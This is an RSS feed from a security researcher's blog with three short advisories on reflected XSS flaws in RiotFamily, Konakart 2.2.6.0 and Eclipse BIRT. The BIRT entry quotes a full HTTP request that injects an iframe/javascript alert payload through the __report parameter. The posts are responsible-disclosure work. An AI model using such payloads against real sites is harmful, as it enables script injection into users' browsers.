<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>AntiSnatch0r &#187; XSS</title>
	<atom:link href="http://antisnatchor.com/tag/xss/feed/" rel="self" type="application/rss+xml" />
	<link>http://antisnatchor.com</link>
	<description>Keeping You Informed on the latest and coolest AntiSnatchOr security researches...</description>
	<lastBuildDate>Thu, 18 Feb 2010 09:40:11 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.5</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>RiotFamily tag 8: still more exploitable points&#8230;</title>
		<link>http://antisnatchor.com/2009/03/20/riotfamily-tag-8-still-more-exploitable-points/</link>
		<comments>http://antisnatchor.com/2009/03/20/riotfamily-tag-8-still-more-exploitable-points/#comments</comments>
		<pubDate>Fri, 20 Mar 2009 18:58:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[RiotFamily]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://antisnatchor.com/?p=59</guid>
		<description><![CDATA[After a few hours of research I&#8217;ve found other two XSS (reflected) insertion points.
More difficult to find, more satisfaction to have succeeded :)
Take a look here please: http://jira.riotfamily.org/browse/RIOT-121.
euronymous
]]></description>
			<content:encoded><![CDATA[<p>After a few hours of research I&#8217;ve found other two XSS (reflected) insertion points.</p>
<p>More difficult to find, more satisfaction to have succeeded :)</p>
<p>Take a look here please: http://jira.riotfamily.org/browse/RIOT-121.</p>
<p>euronymous</p>
]]></content:encoded>
			<wfw:commentRss>http://antisnatchor.com/2009/03/20/riotfamily-tag-8-still-more-exploitable-points/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Konakart 2.2.6.0 Responsible Disclosure</title>
		<link>http://antisnatchor.com/2008/12/22/konakart-2260-responsible-disclosure/</link>
		<comments>http://antisnatchor.com/2008/12/22/konakart-2260-responsible-disclosure/#comments</comments>
		<pubDate>Mon, 22 Dec 2008 16:21:45 +0000</pubDate>
		<dc:creator>antisnatchor</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://antisnatchor.com/?p=39</guid>
		<description><![CDATA[Full Disclosure or Responsible Disclosure? That&#8217;s the problem!
Well, usually I prefer the second one, especially if I&#8217;m working with applications I&#8217;ve used, known or tried at least one time: that&#8217;s the case of Konakart. We actually don&#8217;t use it, but I still recommend it to every people that works with OScommerce (same DB structure) and [...]]]></description>
			<content:encoded><![CDATA[<p><em>Full Disclosure</em> or <em>Responsible Disclosure</em>? <strong>That&#8217;s the problem</strong>!</p>
<p>Well, usually I prefer the second one, especially if I&#8217;m working with applications I&#8217;ve used, known or tried at least one time: that&#8217;s the case of Konakart. <a title="orrlob.com" href="http://www.orrlob.com" target="_blank">We</a> actually don&#8217;t use it, but I still recommend it to every people that works with OScommerce (same DB structure) and don&#8217;t want to be bored developing in JEE.</p>
<p><a href="http://www.konakart.com" target="_blank">Konakart</a> is a really stable product, and now is also more secure on his default configuration: Paolo Sidoli and I worked together to fix frontend related XSS vulnerabilities and a few other bugs. His replies and patches were fast and concrete, and in less than one week we&#8217;ve managed a full pen test and a <a title="XSS Michele Orru" href="http://www.konakart.com/knownproblemsfaq.php" target="_blank">full security patch.</a></p>
<p>I confess that it&#8217;s really amazing to exploit web applications, bypass filters, find bugs and so on, but maybe the most exciting (and under-valuated) phase is the mitigation of those bugs. That&#8217;s clearly true if and only if the team to wich you&#8217;re reporting the vulns is open to collaborate with you: if don&#8217;t, RFpolicy can help us.</p>
<p>Konakart users, please apply the <a href="http://www.konakart.com/knownproblemsfaq.php" target="_blank">patch</a>&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://antisnatchor.com/2008/12/22/konakart-2260-responsible-disclosure/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Eclipse BIRT reflected XSS</title>
		<link>http://antisnatchor.com/2008/12/18/eclipse-birt-reflected-xss/</link>
		<comments>http://antisnatchor.com/2008/12/18/eclipse-birt-reflected-xss/#comments</comments>
		<pubDate>Thu, 18 Dec 2008 12:09:48 +0000</pubDate>
		<dc:creator>antisnatchor</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://antisnatchor.com/?p=31</guid>
		<description><![CDATA[As I was doing an analysis on a few JEE applications that were using BIRT as default report/graph generation engine, I&#8217;ve found an XSS hole (reflected). They will fix it in version 2.5.0 (milestone), even if now the latest stable production version is 2.3.1: quite funny.
Here below my post on bugs.eclipse.org :
A Reflected XSS is [...]]]></description>
			<content:encoded><![CDATA[<p>As I was doing an analysis on a few JEE applications that were using BIRT as default report/graph generation engine, I&#8217;ve found an XSS hole (reflected). They will fix it in version 2.5.0 (milestone), even if now the latest stable production version is 2.3.1: quite funny.</p>
<p>Here below my post on <a href="https://bugs.eclipse.org/bugs/show_bug.cgi?id=259127" target="_blank">bugs.eclipse.org</a> :</p>
<pre class="bz_comment_text">A Reflected XSS is present in the _report parameter: here below
th modified request (that is the BIRT 2.2.1 version included in
Konakart 2.2.6)

GET
/birt-viewer/run?__report='"&gt;&lt;iframe%20src=javascript:alert(666)&gt;
&amp;r=-703171660 HTTP/1.1
Host: localhost:8780
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: <a href="http://localhost:8780/konakartadmin/">http://localhost:8780/konakartadmin/</a>

Konakart is actually using
org.eclipse.birt.core_2.2.1.r22x_v20070924, that is actually
old I guess.

I don't have the time to try the exploit on newer versions,
I leave this to you, even if I suppose that newer version will
be vulnerable too.

Thanks

Michele Orru'</pre>
]]></content:encoded>
			<wfw:commentRss>http://antisnatchor.com/2008/12/18/eclipse-birt-reflected-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
